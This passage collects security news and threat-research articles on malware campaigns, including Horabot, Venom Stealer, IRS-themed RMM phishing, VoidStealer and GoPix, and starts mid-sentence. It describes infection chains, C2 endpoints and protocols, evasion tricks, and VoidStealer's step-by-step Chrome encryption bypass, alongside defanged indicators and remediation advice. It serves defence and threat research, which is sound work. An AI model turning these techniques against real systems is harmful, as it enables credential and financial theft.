(hxxps://tt.grupobedfs[.]com/.../gera_pdf.php), passing a randomly generated four-digit PIN," BlueVoyant said. "The server dynamically forges a bespoke, password-protected PDF impersonating a Spanish judicial summons, which is returned to the infected host. The script then iterates over the filtered email list, utilizing the compromised user's own email account to send a tailored phishing email with the newly generated PDF attached." Also used in tandem is a secondary Horabot-related DLL ("at.dll") that functions as a spam and account hijacking tool targeting Yahoo, Live, and Gmail accounts to send phishing emails via Outlook. Horabot is assessed to be put to use in attacks targeting Latin America since at least November 2020. Water Saci has a history of using WhatsApp Web as a distribution vector for disseminating banking trojans like Maverick and Casbaneiro in a worm-like manner. However, recent campaigns highlighted by Kaspersky have leveraged the ClickFix social engineering tactic to dupe users into running malicious HTA files with the end goal of deploying Casbaneiro and the Horabot spreader. "Taken together, the integration of ClickFix social engineering, alongside dynamic PDF generation and WhatsApp automation, demonstrates an agile adversary that is continually innovating and executing diverse attack paths to bypass modern security controls," the researchers concluded. "This adversary is maintaining a bifurcated, multi-pronged attack infrastructure, dynamically deploying the WhatsApp-centric Maverick chain and concurrently utilizing both ClickFix and email-based Horabot attack paths."
thehackernews.comApr 1, 2026extracted
Bogus Avast website fakes virus scan, installs Venom Stealer instead
A fake website impersonating Avast antivirus is tricking people into infecting their own computers. The site looks legitimate, runs what appears to be a virus scan, and claims your system is full of threats. But the results are fake: when you’re prompted to “fix” the problem, the download you’re given is actually Venom Stealer—a type of malware designed to steal passwords, session cookies, and cryptocurrency wallet data. This is a classic scare-and-fix scam: create panic, then offer a solution. In this case, the “solution” abuses the trusted Avast brand to deliver the attack. A scan that finds exactly what the attacker wants you to see The phishing page is a recreation of the Avast brand, complete with navigation bar, logo, and reassuring certification badges. Visitors are invited to run what appears to be a comprehensive virus scan. Once they click, the page stages a brief animation before delivering its predetermined verdict: three threats found, three threats removed, system protected. A scrolling console log names a specific detection—Trojan:Win32/Zbot.AA!dll—to lend the performance an air of specificity. The victim is then prompted to download the cure: a file called Avast_system_cleaner.exe. This is the payload. And far from cleaning anything, it immediately begins stealing. A Chrome service that is not Chrome When the victim launches Avast_system_cleaner.exe, the binary—a 64-bit Windows PE executable roughly 2 MB in size—copies itself into a location designed to blend in with legitimate software: C:\Program Files\Google\Chrome\Application\v20svc.exe. The dropped file is byte-for-byte identical to the parent, sharing the same MD5 hash (0a32d6abea15f3bfe2a74763ba6c4ef5). It then launches the copy with the command-line flag --v20c, a meaningless argument whose sole purpose is to signal to the malware that it is running in its second-stage role. The disguise is deliberate. A process named v20svc.exe sitting inside Chrome’s application directory looks, at a glance, like a legitimate browser service component. Anyone scanning their task manager would likely scroll past it without a second thought. This is a textbook example of masquerading: naming a malicious binary to match the conventions of trusted software so it escapes casual inspection. A debug artifact baked into the binary confirms its lineage: the PDB path reads crypter_stub.pdb, indicating the executable was packed using a crypter, which is a tool designed to scramble a payload’s code so antivirus engines cannot recognise it from its signature alone. At the time of analysis, only 27% of engines on VirusTotal flagged the sample, meaning roughly three in four commercial antivirus products missed it entirely. YARA rules matched the sample to the Venom Stealer malware family, a known descendant of the Quasar RAT framework that has been sold on underground forums since at least 2020. Venom Stealer is purpose-built for data theft: browser credentials, session cookies, cryptocurrency wallets, and credit card details stored in browsers. Every cookie, every wallet, every saved password Once running, the malware works through a checklist of high-value targets on the victim’s machine. It starts with browsers. Behavioral analysis confirms the malware harvests saved credentials and session cookies. In the analysis environment, it was observed directly accessing Firefox’s cookie database at C:\Users\ \AppData\Roaming\Mozilla\Firefox\Profiles\ \cookies.sqlite-shm. Process memory also contained fully-formed JSON structures with stolen cookie data from Microsoft Edge and Google Chrome, including active sessions for Netflix, YouTube, Reddit, Facebook, LinkedIn, AliExpress, Outlook, Adobe, and Google. Stolen session cookies give the attacker the ability to hijack authenticated browser sessions without needing the victim’s password, including sessions protected by two-factor authentication. The malware also targets cryptocurrency wallets. Behavioral signatures confirm it searches for and attempts to steal locally-stored wallet data, and Venom Stealer is documented as targeting desktop wallet applications. For anyone holding crypto assets on a hot wallet, the implications are immediate. Beyond credentials, the stealer captures a screenshot of the victim’s desktop, saved temporarily as C:\Users\ \AppData\Local\Temp\screenshot_5sIczFxY95t2IQ5u.jpg, and writes a session tracking file to C:\Users\ \AppData\Roaming\Microsoft\fd1cd7a3\sess. A small marker file is also dropped at C:\Users\Public\NTUSER.dat—a path chosen to mimic a legitimate Windows registry hive file and avoid suspicion. Disguised as analytics, delivered over plain HTTP All stolen data is exfiltrated to a single command-and-control domain: app-metrics-cdn[.]com, which resolved to 104.21.14.89 (a Cloudflare address) during analysis. The domain name is crafted to look like a benign analytics or content delivery service, the kind of traffic that might not raise alarm bells in a corporate proxy log. The exfiltration follows a structured four-step sequence over unencrypted HTTP. First, a multipart form-data POST to /api/upload transmits the collected file—screenshots, wallet data, cookie databases—totalling around 140 KB. A second POST to /api/upload-json sends a structured JSON payload of approximately 29 KB containing parsed credentials and cookies. A confirmation POST to /api/upload-complete signals that the theft is finished. The malware then enters a heartbeat loop, periodically checking in at /api/listener/heartbeat to maintain contact with the operator’s infrastructure. All of this traffic uses a generic Mozilla/5.0 user-agent string, another attempt to blend in with ordinary web browsing. Syscalls, sleep loops, and debugger checks Venom Stealer does not simply steal and leave. It takes significant steps to avoid being caught. The most notable evasion technique is the use of direct and indirect system calls, a method where the malware invokes Windows kernel functions directly rather than routing through the standard ntdll.dll library. Because most endpoint detection tools work by intercepting calls to that library, this technique effectively blinds them. This behaviour was flagged in both the parent and the dropped child process. The malware also checks whether it is being debugged, queries CPU vendor and model information, reads the volume serial number of the system drive, creates guard pages in memory that can crash debuggers attempting to step through the code, and enumerates running processes. These are common techniques for detecting virtual machines and analysis environments. To frustrate automated analysis further, it incorporates sleep calls exceeding three minutes. This is not a new trick Impersonating security software to distribute malware is one of the oldest tricks in the book. A user who believes their system is infected is primed to act urgently, and a page that looks like a trusted antivirus vendor is exactly the kind of authority they will defer to. By staging a fake scan that “finds” threats and then offering a cure, the attacker exploits both fear and trust in a single interaction. This is not an isolated tactic. In May 2025, DomainTools documented a separate campaign in which attackers built a convincing clone of Bitdefender’s website and used it to distribute Venom RAT alongside the StormKitty stealer. The playbook is nearly identical: impersonate a security brand, manufacture urgency, and deliver a Trojan dressed as protection. It suggests this is a repeatable template, not a one-off experiment. What to do if you may have been affected Only download security software from official vendor websites. Avast’s legitimate site is avast.com. Do not trust search engine results, ads, or links in unsolicited emails. If you interacted with a site like this or downloaded the file, act quickly: Check if your system is infected. Look for the file v20svc.exe inC:\Program Files\Google\Chrome\Application\ . If it exists, your system was likely compromised by this malware. Run a full system scan immediately. Use a trusted, up-to-date anti-malware tool (such as Malwarebytes) to detect and remove the infection. If the scan finds threats, follow the tool’s recommendations to quarantine or delete them. Change your password right away. Start with email, banking, and any important accounts. Assume anything saved in your browser has been exposed. Sign out of all active sessions. Log out of services like Google, Microsoft, Facebook, and Netflix. Stolen session cookies allow an attacker to bypass two-factor authentication entirely. Protect cryptocurrency funds. If you use a desktop cryptocurrency wallet, transfer your funds to a new wallet generated on a clean device as soon as possible. Indicators of Compromise (IOCs) File hashes SHA-256: ecbeaa13921dbad8028d29534c3878503f45a82a09cf27857fa4335bd1c9286d Domains app-metrics-cdn[.]com Network indicators 104.21.14.89 C2 URLs http://app-metrics-cdn[.]com/api/upload http://app-metrics-cdn[.]com/api/upload-json http://app-metrics-cdn[.]com/api/upload-complete http://app-metrics-cdn[.]com/api/listener/heartbeat From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comMar 27, 2026extracted
Microsoft Warns IRS Phishing Hits 29,000 Users, Deploys RMM Malware
Microsoft has warned of fresh campaigns that are capitalizing on the upcoming tax season in the U.S. to harvest credentials and deliver malware. The email campaigns take advantage of the urgency and time-sensitive nature of emails to send phishing messages masquerading as refund notices, payroll forms, filing reminders, and requests from tax professionals to deceive recipients into opening malicious attachments, scanning QR code, or interacting with suspicious links. "Many campaigns target individuals for personal and financial data theft, but others specifically target accountants and other professionals who handle sensitive documents, have access to financial data, and are accustomed to receiving tax-related emails during this period," the Microsoft Threat Intelligence and Microsoft Defender Security Research teams said in a report published last week. While some of these efforts direct users to sketchy pages designed through Phishing-as-a-service (PhaaS) platforms, others result in the deployment of legitimate remote monitoring and management tools (RMMs), such as ConnectWise ScreenConnect, Datto, and SimpleHelp, enabling the attackers to gain persistent access to compromised devices. The details of some of the campaigns are below - Using Certified Public Accountant (CPA) lures to deliver phishing pages associated with the Energy365 PhaaS kit to capture victims' email and password. The Energy365 phishing kit is estimated to be sending hundreds of thousands of malicious emails on a daily basis. Using QR code and W2 lures to target approximately 100 organizations, mainly in the manufacturing, retail, and healthcare industries located in the U.S., to direct users to phishing pages mimicking the Microsoft 365 sign-in pages and built using the SneakyLog (aka Kratos) PhaaS platform to siphon their credentials and two-factor authentication (2FA) codes. Using tax-themed domains for use in phishing campaigns that trick users into clicking on bogus links under the pretext of accessing updated tax forms, only to distribute ScreenConnect. Impersonating the Internal Revenue Service (IRS) with a cryptocurrency lure that specifically targeted the higher education sector in the U.S., instructing recipients to download a "Cryptocurrency Tax Form 1099" by accessing a malicious domain ("irs-doc[.]com" or "gov-irs216[.]net") to deliver ScreenConnect or SimpleHelp. Targeting accountants and related organizations, asking for help to file their taxes by sending a malicious link that leads to the installation of Datto. Microsoft said it also observed a large-scale phishing campaign on February 10, 2026, in which more than 29,000 users across 10,000 organizations were affected. About 95% of the targets were located in the U.S., spanning industries like financial services (19%), technology and software (18%), and retail and consumer goods (15%). "The emails impersonated the IRS, claiming that potentially irregular tax returns had been filed under the recipient's Electronic Filing Identification Number (EFIN). Recipients were instructed to review these returns by downloading a purportedly legitimate 'IRS Transcript Viewer,'" the tech giant said. The emails, which were sent through Amazon Simple Email Service (SES), contained a "Download IRS Transcript View 5.1" button that, when clicked, redirected users to smartvault[.]im, a domain masquerading as SmartVault, a well-known document management and sharing platform. The phishing site relied on Cloudflare to keep bots and automated scanners at bay, thus ensuring that only human users are served the main payload: a maliciously packaged ScreenConnect that grants the attackers remote access to their systems and facilitates data theft, credential harvesting, and further post‑exploitation activity. To stay safe against these attacks, organizations are recommended to enforce 2FA on all users, implement conditional access policies, monitor and scan incoming emails and visited websites, and prevent users from accessing the malicious domains. The development coincides with the discovery of several campaigns that have been found to drop remote access malware or conduct data theft - Using fake Google Meet and Zoom pages to lure users into fraudulent video calls that ultimately deliver remote-access software like Teramind, a legitimate employee monitoring platform, by means of a bogus software update. Using a fraudulent website that leverages the Avast branding to trick French-speaking users into handing over their full credit card details as part of a refund scam. Using a typosquatted website impersonating the official Telegram download portal ("telegrgam[.]com") to distribute trojanized installers that, in addition to dropping a legitimate Telegram installer, execute a DLL responsible for launching an in-memory payload. The malware then initiates communication with its command-and-control infrastructure to receive instructions, download updated components, and maintain persistent access. Abusing Microsoft Azure Monitor alert notifications to deliver callback phishing emails that use invoice and unauthorized-payment lures. "Attackers create malicious Azure Monitor alert rules, embedding scam content in the alert description, including fake billing details and attacker-controlled support phone numbers," LevelBlue said. "Victims are then added to the Action Group linked to the alert rule, causing Azure to send the phishing message from the legitimate sender address [email protected]." Using quotation-themed lures in phishing emails to deliver a JavaScript dropper that connects to an external server to download a PowerShell script, which launches the trusted Microsoft application "Aspnet_compiler.exe" and injects into it an XWorm 7.1 payload via reflective DLL injection. The updated malware comes with a .NET-developed component engineered for stealth and persistence. Similar requests for quotation lures have also been used to trigger a fileless Remcos RAT infection chain. Using phishing emails and ClickFix ploys to deliver NetSupport RAT and gain unauthorized system access, exfiltrate data, and deploy additional malware. Using Microsoft Application Registration Redirect URI's ("login.microsoftonline[.]com") in phishing emails to abuse trust relationships and bypass email spam filters to redirect users to phishing websites that capture victims' credentials and 2FA codes. Abusing legitimate URL rewriting services from Avanan, Barracuda, Bitdefender, Cisco, INKY, Mimecast, Proofpoint, Sophos, and Trend Micro to conceal malicious URLs in phishing emails evades detection. "Threat actors have increasingly adopted multi-vendor chained redirection in their phishing campaigns," LevelBlue said. "Earlier activity typically relied on a single rewriting service, but newer campaigns stack multiple layers of already‑rewritten links. This nesting makes it significantly harder for security platforms to reconstruct the full redirect path and identify the final malicious destination." Using malicious ZIP files impersonating a wide range of software, including artificial intelligence (AI) image generators, voice-changing tools, stock-market trading utilities, game mods, VPNs, and emulators, to deliver Salat Stealer or MeshAgent, along with a cryptocurrency miner. The campaign has specifically targeted users in the U.S., the U.K., India, Brazil, France, Canada, and Australia. Using digital invitation lures sent via phishing emails to divert users to a fake Cloudflare CAPTCHA page that delivers a VBScript, which then runs PowerShell code to fetch an evasive .NET loader dubbed SILENTCONNECT from Google Drive to eventually deliver ScreenConnect. The findings follow an uptick in RMM adoption by threat actors, with the abuse of such tools surging 277% year-over-year, according to a recent report published by Huntress. One notable tactic involves the daisy-chaining of distinct RMM tools to fragment telemetry, distribute persistence, and complicate attribution and containment efforts, the company added. "As these tools are used by legitimate IT departments, they are typically overlooked and considered 'trusted' in most corporate environments," Elastic Security Labs researchers Daniel Stepanic and Salim Bitam said. "Organizations must stay vigilant, auditing their environments for unauthorized RMM usage."
thehackernews.comMar 23, 2026extracted
VoidStealer malware steals Chrome master key via debugger trick
An information stealer called VoidStealer uses a new approach to bypass Chrome’s Application-Bound Encryption (ABE) and extract the master key for decrypting sensitive data stored in the browser. The novel method is stealthier and relies on hardware breakpoints to extract the v20_master_key, used for both encryption and decryption, directly from the browser's memory, without requiring privilege escalation or code injection. A report from Gen Digital, the parent company behind the Norton, Avast, AVG, and Avira brands, notes that this is the first case of an infostealer observed in the wild to use such a mechanism. Google introduced ABE in Chrome 127, released in June 2024, as a new protection mechanism for cookies and other sensitive browser data. It ensures that the master key remains encrypted on disk and cannot be recovered through normal user-level access. Decrypting the key requires the Google Chrome Elevation Service, which runs as SYSTEM, to validate the requesting process. However, this system has been bypassed by multiple infostealer malware families and has even been demonstrated in open-source tools. Although Google implemented fixes and improvements to block these bypasses, new malware versions reportedly continued to succeed using other methods. “VoidStealer is the first infostealer observed in the wild adopting a novel debugger-based Application-Bound Encryption (ABE) bypass technique that leverages hardware breakpoints to extract the v20_master_key directly from browser memory,” says Vojtech Krejsa, threat researcher at Gen Digital. VoidStealer is a malware-as-a-service (MaaS) platform advertised on dark web forums since at least mid-December 2025. The malware introduced the new ABE bypass mechanism in version 2.0. Stealing the master key VoidStealer's trick to extract the master key is to target a short moment when Chrome’s v20_master_key is briefly present in memory in plaintext state during decryption operations. Specifically, VoidStealer starts a suspended and hidden browser process, attaches it as a debugger, and waits for the target browser DLL (chrome.dll or msedge.dll) to load. When loaded, it scans the DLL for a specific string and the LEA instruction that references it, using that instruction's address as the hardware breakpoint target. Next, it sets that breakpoint across existing and newly created browser threads, waits for it to trigger during startup while the browser is decrypting protected data, then reads the register holding a pointer to the plaintext v20_master_key and extracts it with ‘ReadProcessMemory.’ Gen Digital explains that the ideal time for the malware to do this is during browser startup, when the application loads ABE-protected cookies early, forcing the decryption of the master key. The researchers explained that VoidStealer likely did not invent this technique but rather adopted it from the open-source project ‘ElevationKatz,’ part of the ChromeKatz cookie-dumping toolset that demonstrates weaknesses in Chrome. Although there are some differences in the code, the implementation appears to be based on ElevationKatz, which has been available for more than a year. BleepingComputer has contacted Google with a request for a comment on this bypass method being used by threat actors, but a reply was not available by publishing time. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 22, 2026extracted
The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico
Introduction In this installment of our SOC Files series, we will walk you through a targeted campaign that our MDR team identified and hunted down a few months ago. It involves a threat known as Horabot, a bundle consisting of an infamous banking Trojan, an email spreader, and a notably complex attack chain. Although previous research has documented Horabot campaigns (here and here), our goal is to highlight how active this threat remains and to share some aspects not covered in those analyses. The starting point As usual, our story begins with an alert that popped up in one of our customers’ environments. The rule that triggered it is generic yet effective at detecting suspicious mshta activity. The case progressed from that initial alert, but fortunately ended on a positive note. Kaspersky Endpoint Security intervened, terminated the malicious process (via a proactive defense module (PDM)) and removed the related files before the threat could progress any further. The incident was then brought up for discussion at one of our weekly meetings. That was enough to spark the curiosity of one of our analysts, who then delved deeper into the tradecraft behind this campaign. The attack chain After some research and a lot of poking around in the adversary infrastructure, our team managed to map out the end-to-end kill chain. In this section, we will break down each stage and explain how the operation unfolds. Stage 1: Initial lure Following the breadcrumbs observed in the reported incident, the activity appears to begin with a standard fake CAPTCHA page. In the incident mentioned above, this page was located at the URL https://evs.grupotuis[.]buzz/0capcha17/ (details about its content can be found here). Similar to the Lumma and Amadey cases, this page instructs the user to open the Run dialog, paste a malicious command into it and then run it. Once deceived, the victim pastes a command similar to the one below: This command retrieved and executed an HTA file that contained the following: It is essentially a small loader. When executed, it opens a blank window, then immediately pulls and runs an external JavaScript payload hosted on the attacker’s domain. The body contains a large block of random, meaningless text that serves purely as filler. Stage 2: A pinch of server-side polymorphism The payload loaded by the HTA file dynamically creates a new element, sets its source to an external VBScript hosted on another attacker-controlled domain, and injects it into the section of a page hardcoded in the HTA. You can see the full content of the page in the box below. Once appended, the external VBScript is immediately fetched and executed, advancing the attack to its next stage. The next-stage VBS content resembles the example shown below. During our analysis, we observed the use of server-side polymorphism because each access to the same resource returned a slightly different version of the code while preserving the same functionality. The script is obfuscated and employs a custom string encoding routine. Below is a more readable version with its strings decoded and replaced using a small Python script that replicates the decode_str() routine. The script performs pretty much the same function as the initial HTA file. It reaches a JavaScript loader that injects and executes another polymorphic VBScript. Unlike the first script, this one is significantly more complex, with more than 400 lines of code. It acts as the heavy lifter of the operation. Below is a brief summary of its key characteristics: Heavy obfuscation: the script uses multiple layers of obfuscation to obscure its behavior. Custom string decoder: employs the same decoding routine found in the first VBScript to reconstruct strings at runtime. Anti-VM and “anti-Avast”: performs basic environment checks and terminates if a specific Avast folder or VM artifacts are detected. Information gathering and exfiltration: collects the host IP, hostname, username, and OS version, then sends this data to a C2 server. Download of additional components: retrieves an AutoIt executable, its compiler (Aut2Exe), a script (au3), and a blob file, placing them under the hardcoded path C:\Users\Public\LAPTOP-0QF0NEUP4 . PowerShell command execution: executes PowerShell commands that reach out to two different URLs (one unavailable and the other leading to the first stager of the spreader, which we describe later in this article). Persistence setup: creates a LNK file and drops it into the Startup folder to maintain persistence. Cleanup routines: removes temporary files and terminates selected processes. During our analysis of the heavy lifter, specifically within the exfiltration routine, we identified where the collected data was being sent. After probing the associated URL and removing the “salvar.php” portion, we uncovered an exposed webpage where the adversary listed all their victims. As you may have noticed, the table is in Brazilian Portuguese and lists victims dating back to May 2025 (this screenshot was taken in September 2025). In the “Localização” (location) column, the adversary even included the victims’ geographic coordinates, which are redacted in the screenshot. A quick breakdown shows that, of the 5384 victims, 5030 were located in Mexico, representing roughly 93% of the total. Stage 3: The evil combination of AutoIT and a banking Trojan It is now time to focus on the files downloaded by our heavy lifter. As previously mentioned, three AutoIT components were dropped on disk: the executable (AutoIT3), the compiler (Aut2Exe), and the script (au3), along with an encrypted blob file. Since we have access to the AutoIt script code, we can analyze its routines. However, it contains over 750 lines of heavily obfuscated code, so let’s focus only on what really matters. The most important routine is responsible for decrypting the blob file (it uses AES-192 with a key derived from the seed value 99521487), loading it directly into memory, and then calling the exported function B080723_N. The decrypted blob is a DLL. We also managed to replicate the decryption logic with a Python script and manually extract the DLL (0x6272EF6AC1DE8FB4BDD4A760BE7BA5ED). After initial triage and basic sandbox execution, we observed the following: The sample is a well-known Delphi banking Trojan detected by several engines under different names, such as Casbaneiro, Ponteiro, Metamorfo, and Zusy. It embeds two old OpenSSL libraries (libeay32.dll and ssleay32.dll) from the Indy Project, an open-source client/server communications library used to establish client/server HTTPS C2 communication. It includes SQL commands used to harvest credentials from browsers. Once loaded into memory, the Trojan sends several HTTP requests to different URLs: Since this malware family has been extensively documented in previous studies, we won’t reiterate its well-known functionality. Instead, we’ll focus on lesser-documented and newly observed features, including the malware’s encryption and protocol handling logic. The sample implements a stateful XOR-subtraction cipher in the sub_00A86B64 subroutine, which is used to protect strings and decrypt HTTP data received from the C2. Unlike simple XOR, each byte of output here depends on both the key and the previous byte. In our sample, the key is the string "0xFF0wx8066h". We can easily reimplement the logic of the routine in Python and integrate the following snippet into our workflow to automate string decryption: Python implementation of the decryption routine The encrypted strings are retrieved in three different ways: through indexed lookups using a global encrypted Delphi string list (also observed by our colleagues at ESET); via direct references to encrypted hex strings in the data section; through indirect references using pointer variables, adding an overhead when automating decryption with scripts. The malware fetches its configuration by performing an HTTPS GET request to the hardcoded, encrypted C2 server. The server responds with a configuration, which is a raw HTTP response, consisting of several values, each individually encrypted with the aforementioned algorithm. The sample extracts specific parameters based on their position in the list. To improve readability, the above screenshot has been edited to include the decrypted parameters, which are separated by double newlines. Configuration retrieval and parsing are initiated in the sub_00AD2C70 subroutine where the first configuration value, the C2 socket connection setting (host;port), is extracted. If parsing fails, the malware falls back to a hardcoded secondary C2 socket address. The socket connection is then established. Additional configuration values are parsed insub_00AD2918 and its subroutines. For example, in the decrypted C2 configuration shown above, parameter 5 contains the “UPON” string that triggers execution, and parameter 6 contains the PowerShell commands that are run when this string is used. Below is the portion of the routine that takes care of parsing this command: In addition to HTTP communication, the malware supports raw socket communication using a custom protocol that encapsulates commands into tags such as or Arg1 Arg2 . The client initiates the C2 connection in sub_00AD331C, where it establishes a TCP socket to the operator’s server and sends the "PRINCIPAL" command to request a control channel. After receiving an OK response, it follows up with an "Info" message containing system details. Once validated, the server replies with a "SocketMain" message containing a session ID, completing the handshake. All subsequent command handling occurs in sub_00AD373C, a central orchestrator routine that parses incoming messages and dispatches the malicious actions. The sample, and therefore the protocol itself, is inherited, from the open-source Delphi Remote Access PC project, as our colleagues at ESET have noted in the past. Below is a visual comparison: Some features from the open-source project, including the chat and file manipulation commands, have been removed, while some mouse-related commands have been renamed with playful prefixes like “LULUZ” (e.g., LULUZLD, LULUZPos). This could be an inside joke, anti-analysis obfuscation, or a way to mark custom variants. Beyond the standard functionality, the protocol now includes a range of additional custom commands, such as LULUZSD for mouse wheel scrolling down, ENTERMANDA to simulate pressing the Enter key, and COLADIFKEYBOARD to inject arbitrary text as keystrokes. The full command set is considerably larger, and while not all commands are implemented in the analyzed sample, evidence of their presence (e.g., in the form of strings) suggests ongoing development. After getting a sense of the protocol, let’s focus on the cipher used. In this sample, traffic exchanged via the C2 socket channel is encrypted using another stateful XOR algorithm with embedded decryption keys. Its logic is implemented in the routines sub_00A9F2D0 (encryption) and sub_00A9F5C0 (decryption): The encryption routine generates three random four-digit integer keys. The first key acts as the initial cipher state, while the other two serve as the multiplier and increment that are applied at every encryption stage to both the state and the data. For each character in the input string, it takes the high byte of the current state, XORs it with the character to encrypt, and then updates the cipher state for the next character. The output is created by prepending the three keys to the ciphertext, encapsulating everything within the “##” markers. The final output looks like this: Here’s a Python snippet to decode such traffic: Although this encryption layer was likely intended to evade network inspection, it ironically makes detection easier due to its highly regular and repetitive structure. This pattern, including the external markers “##”, is uncommon in legitimate traffic and can be used as a reliable network signature for IDS/IPS systems. Below is a Suricata rule that matches the described structure: As documented by our colleagues at Fortinet, the malware contains functionality to display fake pop-ups prompting victims to enter their banking credentials. The images for these pop-ups are stored as encrypted resources. Unlike strings, resources are decrypted using the standard RC4 cipher, and the key pega-avisao3234029284 is retrieved from the previous TStringList structure at offset 3FEh. The wordplay around “pega a visão”, Brazilian slang meaning “get the picture” figuratively, reveals an intentional cultural reference, supporting the already well-known Brazilian ties of the operators who have a native understanding of the language. Below is a collage of pictures where the targeted bank overlays are visible. Stage 4: The spreader In our tests, we noticed that both the VBScript (the heavy lifter) and the Delphi DLL have overlapping functionality for downloading the next stage via PowerShell. Although they rely on different domains, they follow the same URL pattern. We tried accessing URLs meant for downloading the spreader. One returned nothing, while the other displayed a sequence of two PowerShell stagers before reaching the actual spreader. In the second stager, we found several Base64-encoded URLs, but only one of them was active during our analysis. Based on comments found in the spreader code, we suspect that in previous versions or campaigns the spreader was assembled piece by piece from these other URLs. In our case, however, a single URL contained all the necessary code. Yes, we also wondered how PowerShell could possibly accept ASCII chaos as variable/function names, but it does. After cleaning up the messy naming convention and reviewing the well-commented routines (thanks, threat actor), we were able to identify its main duties: Harvest emails via the MAPI namespace; Exfiltrate unique email addresses to the C2; Clean up the outbox; Filter the exfiltrated email addresses against a blocklist of keywords; Prepare a phishing email containing a malicious PDF; Mass-distribute the email to the filtered addresses. One interesting point is that the spreader’s code and comments allow us to extract some useful intel: All comments are written in Brazilian Portuguese, which gives a strong indication of the threat actor’s origin. It is fairly easy to distinguish comments written by a human from those most likely generated by an AI/LLM; the latter are too formal and remarkably well-formatted. One of the human comments actually inspired the title of this article. One of the comments in the code reads “limpa a caixa de saida antes de sapecar”. Sapecar has a very specific meaning that only Brazilian Portuguese speakers would naturally understand. The closest equivalent to this comment in English would be: “Clear the outbox before you blast it off or let it rip.” Our team tracked Horabot activity for a few months and compiled a collection of malicious attachment examples used in this campaign. They are all written in Spanish and urge the user to click a large button in the document to access a “confidential file” or an “invoice”. Clicking the button triggers the same infection chain described in this article. Detection engineering and threat hunting opportunities After navigating this long, layered attack chain, we bet some of the tech folks reading this have already started imagining potential detection opportunities. With that in mind, this section provides some rules and queries that you can use to detect and hunt this threat in your own environment. YARA rules The YARA rules focus on two core components of the operation: the AutoIt script that functions as the loader, and the Delphi DLL that serves as the banking Trojan. Hunting queries You may notice that some patterns in this section do not appear in the URLs described earlier in the article. These additional patterns were included because we observed small variations introduced by the threat actor over time, such as the use of QR codes in the lure pages.
securelist.comMar 18, 2026extracted
Free real estate: GoPix, the banking Trojan living off your memory
Introduction GoPix is an advanced persistent threat targeting Brazilian financial institutions’ customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions’ customers. Our extensive analysis reveals GoPix’s capabilities to execute man-in-the-middle attacks, monitor Pix transactions, Boleto slips, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts. GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It’s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable. The threat differs in its behavior from the RATs already seen in other Brazilian families, such as Grandoreiro. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims, financial bodies of state governments and large corporations. The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix’s ability to evade traditional security defenses and steal and manipulate sensitive financial data. The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique. Initial infection Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages. We have been monitoring this threat since 2023, and it continues to be very active for the time being. GoPix malware campaign detections (download) The initial infection vector is shown below: When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered. However, if the victim passes the bot check, the malicious website will query the check.php endpoint, which will then return a JSON response with two URLs: The victim will then be presented with a fake webpage offering to download advertised software, this being the malicious “WhatsApp Web installer” in the case at hand. To decide which URL the victim will be redirected to, another check happens in the JavaScript code for whether the 27275 port is open on localhost. This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (url2). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (url), which offers to download a fake WhatsApp executable NSIS installer. At first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below. Infection chain First-stage payload If no Avast solution is installed, an executable NSIS installer file is delivered to the victim’s device. The attackers change this installer frequently to avoid detection. It’s digitally signed with a stolen code signing certificate issued to “PLK Management Limited”, also used to sign the legitimate “Driver Easy Pro” software. The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload. However, if the 27275 port is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line. Deobfuscated command line: The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above. It’s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered. Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it’s defined as “PowerShell Script”). Initial PowerShell script This script’s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim’s computer. The information contained within this JSON is as follows: Folder and file names to be created under the %APPDATA% directory Obfuscated PowerShell 